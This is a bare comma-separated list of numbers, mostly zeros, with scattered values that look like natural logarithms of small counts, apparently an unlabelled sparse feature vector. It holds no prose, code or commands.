5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 6.591673732008658, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.465908118654584, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 5.95562797505323, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 4.762173934797756, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 4.736198448394496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 4.330733340286331, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.101797476893978, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.3862943611198906, 0, 0.0, 0, 0.0, 0.0, 6.102339570951937, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.178053830347946, 0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.459585514144159, 0, 0.0, 0.0, 0.0, 2.995732273553991, 3.2958368660043296, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 8.73217391546585, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 1.3862943611198906, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 4.06534854782536, 0, 0.0, 0.0, 0, 0, 1.9459101490553132, 0, 0.0, 0, 4.795790545596741, 0, 0.0, 4.518263445217986, 3.5553480614894135, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 0.6931471805599453, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.6931471805599453, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 1.7412592803704001, 0, 0, 3.93848385770662, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 4.160336650881089, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 2.9444389791664403, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 4.204692619390966, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.6888794541139363, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 9.174503799921432, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.8858724694518925, 0.0, 0, 0.0, 0, 1.0986122886681098, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.6390573296152584, 1.3862943611198906, 0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 4.2626798770413155, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.295836866004329, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0.0, 0, 0, 0.0, 0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6888794541139363, 0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.46286043483228, 6.127701357652087, 0, 0.0, 0, 0.0, 2.1972245773362196, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7369991058576035, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.666426688112432, 2.4849066497880004, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 0.0, 0, 0, 3.6635616461296467, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0, 0.0, 0, 0, 1.0986122886681098, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 2.772588722239781, 0.0, 0, 0.0, 3.5553480614894135, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 4.748123315783209, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 4.66682536764049, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0, 1.0986122886681098, 0, 0, 0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.6375861597263857, 0, 0.0, 0.0, 2.70805020110221, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 6.54135323573334, 0, 0.0, 2.0794415416798357, 0, 0, 1.9459101490553132, 0, 0.0, 0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.8066624897703196, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 5.666426688112432, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.2237778411112, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 